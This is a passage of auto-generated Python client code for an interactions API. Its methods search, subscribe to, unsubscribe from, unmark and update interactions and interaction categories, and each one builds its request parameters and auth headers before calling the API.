'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method search_interactions" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'search_text' is set if ('search_text' not in params) or (params['search_text'] is None): raise ValueError("Missing the required parameter `search_text` when calling `search_interactions`") # verify the required parameter 'interaction_status' is set if ('interaction_status' not in params) or (params['interaction_status'] is None): raise ValueError("Missing the required parameter `interaction_status` when calling `search_interactions`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `search_interactions`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `search_interactions`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `search_interactions`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `search_interactions`") resource_path = '/interactions/search'.replace('{format}', 'json') path_params = {} query_params = {} if 'search_text' in params: query_params['searchText'] = params['search_text'] if 'interaction_type' in params: query_params['interactionType'] = params['interaction_type'] if 'interaction_status' in params: query_params['interactionStatus'] = params['interaction_status'] if 'association' in params: query_params['association'] = params['association'] if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/json']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionList', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def subscribe_interactin_category(self, category_id, requester_id, client_token, **kwargs): """ Subscribe interaction category Returns the subscribed interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.subscribe_interactin_category(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs) else: (data) = self.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs) return data def subscribe_interactin_category_with_http_info(self, category_id, requester_id, client_token, **kwargs): """ Subscribe interaction category Returns the subscribed interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.subscribe_interactin_category_with_http_info(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method subscribe_interactin_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `subscribe_interactin_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `subscribe_interactin_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `subscribe_interactin_category`") resource_path = '/interactions/categories/{categoryId}/subscribe'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def subscribe_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Subscribe interaction Allows the user to subscribe a interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.subscribe_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def subscribe_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Subscribe interaction Allows the user to subscribe a interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.subscribe_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method subscribe_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `subscribe_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `subscribe_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `subscribe_interaction`") resource_path = '/interactions/{interactionId}/subscribe'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def unmark_as_an_response(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Unmark response as a response Unmarks the response. This will remove the marked response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unmark_as_an_response(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) else: (data) = self.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs) return data def unmark_as_an_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs): """ Unmark response as a response Unmarks the response. This will remove the marked response. This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unmark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int response_id: responseId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method unmark_as_an_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `unmark_as_an_response`") # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `unmark_as_an_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `unmark_as_an_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `unmark_as_an_response`") resource_path = '/interactions/{interactionId}/responses/{responseId}/unmark'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def unsubscribe_interactin_category(self, category_id, requester_id, client_token, **kwargs): """ Unsubscribe interaction category Returns the unsubscribed interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unsubscribe_interactin_category(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs) else: (data) = self.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, **kwargs) return data def unsubscribe_interactin_category_with_http_info(self, category_id, requester_id, client_token, **kwargs): """ Unsubscribe interaction category Returns the unsubscribed interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unsubscribe_interactin_category_with_http_info(category_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ all_params = ['category_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method unsubscribe_interactin_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `unsubscribe_interactin_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `unsubscribe_interactin_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `unsubscribe_interactin_category`") resource_path = '/interactions/categories/{categoryId}/unsubscribe'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def unsubscribe_interaction(self, interaction_id, requester_id, client_token, **kwargs): """ Unsubscribe interaction Allows the user to unsubscribe a interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unsubscribe_interaction(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) else: (data) = self.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, **kwargs) return data def unsubscribe_interaction_with_http_info(self, interaction_id, requester_id, client_token, **kwargs): """ Unsubscribe interaction Allows the user to unsubscribe a interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.unsubscribe_interaction_with_http_info(interaction_id, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method unsubscribe_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `unsubscribe_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `unsubscribe_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `unsubscribe_interaction`") resource_path = '/interactions/{interactionId}/unsubscribe'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_interaction(self, interaction_id, interaction_title, requester_id, client_token, **kwargs): """ Update interaction Allows the user to update interaction. Returns the updated interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction(interaction_id, interaction_title, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_title: Interaction Title (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_description: Describe Interaction :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, **kwargs) else: (data) = self.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, **kwargs) return data def update_interaction_with_http_info(self, interaction_id, interaction_title, requester_id, client_token, **kwargs): """ Update interaction Allows the user to update interaction. Returns the updated interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_title: Interaction Title (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_description: Describe Interaction :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'interaction_title', 'requester_id', 'client_token', 'interaction_description', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `update_interaction`") # verify the required parameter 'interaction_title' is set if ('interaction_title' not in params) or (params['interaction_title'] is None): raise ValueError("Missing the required parameter `interaction_title` when calling `update_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'interaction_title' in params: form_params.append(('interactionTitle', params['interaction_title'])) if 'interaction_description' in params: form_params.append(('interactionDescription', params['interaction_description'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_interaction_category(self, category_id, category_name, requester_id, client_token, **kwargs): """ Update interaction category Allows the user to update the interaction category. Returns the updated interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_category(category_id, category_name, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str category_name: Category Name (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_description: Describe category :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, **kwargs) else: (data) = self.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, **kwargs) return data def update_interaction_category_with_http_info(self, category_id, category_name, requester_id, client_token, **kwargs): """ Update interaction category Allows the user to update the interaction category. Returns the updated interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str category_name: Category Name (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_description: Describe category :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ all_params = ['category_id', 'category_name', 'requester_id', 'client_token', 'category_description', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `update_interaction_category`") # verify the required parameter 'category_name' is set if ('category_name' not in params) or (params['category_name'] is None): raise ValueError("Missing the required parameter `category_name` when calling `update_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_interaction_category`") resource_path = '/interactions/categories/{categoryId}'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = 